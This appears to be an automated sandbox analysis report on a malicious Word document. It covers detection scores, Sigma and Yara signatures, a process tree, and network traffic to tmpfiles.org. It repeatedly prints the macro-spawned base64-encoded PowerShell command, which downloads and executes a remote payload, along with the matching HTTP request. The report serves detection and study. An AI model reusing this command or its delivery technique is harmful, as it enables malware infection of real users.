Edit tour

Windows Analysis Report
test.doc.bin.doc

Overview

General Information

Sample name:	test.doc.bin.doc
Analysis ID:	1583048
MD5:	0c9f45c5f7ca6b930e912005bdc28e35
SHA1:	e064b2221df8bbb82c17da0d06e8282c513d2eb4
SHA256:	095a8d9dcce2ce35502bfa33f28ac47307c2a2f399b715624f2efae80e8ca520
Tags:	docuser-JaffaCakes118
Infos:

Detection

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Powershell download and execute

Document exploit detected (process start blacklist hit)

Encrypted powershell cmdline option found

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Office process queries suspicious COM object (likely to drop second stage)

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Sigma detected: Suspicious Encoded PowerShell Command Line

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Contains long sleeps (>= 3 min)

Detected non-DNS traffic on DNS port

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Suspicious Execution of Powershell with Base64

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

WINWORD.EXE (PID: 6252 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding MD5: 1A0C2C2E7D9C4BC18E91604E9B0C7678)

powershell.exe (PID: 5144 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5728 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
Process Memory Space: powershell.exe PID: 5144	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi32_5144.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Sigma Signatures

System Summary

Sigma detected: PowerShell Base64 Encoded IEX Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6252, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 5144, ProcessName: powershell.exe

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6252, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 5144, ProcessName: powershell.exe

Sigma detected: Suspicious Microsoft Office Child Process

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6252, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 5144, ProcessName: powershell.exe

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Sigma detected: Suspicious Execution of Powershell with Base64

Source: Process started

Author: frack113: Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6252, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 5144, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE, ParentProcessId: 6252, ParentProcessName: WINWORD.EXE, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwB0AG0AcABmAGkAbABlAHMALgBvAHIAZwAvAGQAbAAvADEAOAA3ADEAMgA3ADUAOAAvAHIAZwB2AHMAbwB6AGcAdQA4AHgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA"", ProcessId: 5144, ProcessName: powershell.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: test.doc.bin.doc	Virustotal: Detection: 50%			Perma Link
Source: test.doc.bin.doc	ReversingLabs: Detection: 34%

Machine Learning detection for dropped file

Source: C:\Users\user\Desktop\~WRD0000.tmp

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: test.doc.bin.doc

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 104.21.21.16:443 -> 192.168.2.5:49712 version: TLS 1.2

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2131528419.0000000002633000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.pdbnProvider,Sy source: powershell.exe, 00000006.00000002.2131528419.0000000002633000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic

DNS query: name: tmpfiles.org

Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443

Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 104.21.21.16:443 -> 192.168.2.5:49712
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:49712 -> 104.21.21.16:443
Source: global traffic	TCP traffic: 192.168.2.5:59221 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:59221
Source: global traffic	TCP traffic: 192.168.2.5:59221 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:59221 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:59221
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:59221
Source: global traffic	TCP traffic: 192.168.2.5:59221 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:59221
Source: global traffic	TCP traffic: 192.168.2.5:59221 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:58070 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:58070
Source: global traffic	TCP traffic: 192.168.2.5:58070 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:58070 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:58070
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:58070
Source: global traffic	TCP traffic: 192.168.2.5:58070 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 1.1.1.1:53 -> 192.168.2.5:58070
Source: global traffic	TCP traffic: 192.168.2.5:58070 -> 1.1.1.1:53

Source: global traffic	TCP traffic: 192.168.2.5:58070 -> 1.1.1.1:53
Source: global traffic	TCP traffic: 192.168.2.5:59221 -> 1.1.1.1:53

Source: global traffic

HTTP traffic detected: GET /dl/18712758/rgvsozgu8x.jpg HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 104.21.21.16 104.21.21.16

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	TCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /dl/18712758/rgvsozgu8x.jpg HTTP/1.1Host: tmpfiles.orgConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: tmpfiles.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 01 Jan 2025 16:20:31 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: no-cache, privateCF-Cache-Status: BYPASSSet-Cookie: XSRF-TOKEN=eyJpdiI6IjQrc0RseUMxMVNYbzRKcStOeWZBR2c9PSIsInZhbHVlIjoicGNMaUJCd0VQRy9XeXdweGlGd21pSXByeFVtZ0NRVUd6TlNvRmJHZmRDYXpuWWZUcmY2Wkp0T2p0UTF2cEpLZHo4SmJTU0toc1RqTERMYitJRTJWWHZRM1RzUTJZdmEzMzRWVVhINC9kU09tQ3pucjN0UmZGY1VLMDV5a2lmdFUiLCJtYWMiOiIxZTA3OGY0NTJlZTViNjczNWI5YzViNDY1MWFmZWU2M2IzZDE3NGE2MDU2NWYxNjVjMWVjNTg4NjE3NGJmMjYyIn0%3D; expires=Wed, 01-Jan-2025 18:20:31 GMT; Max-Age=7200; path=/; samesite=laxSet-Cookie: 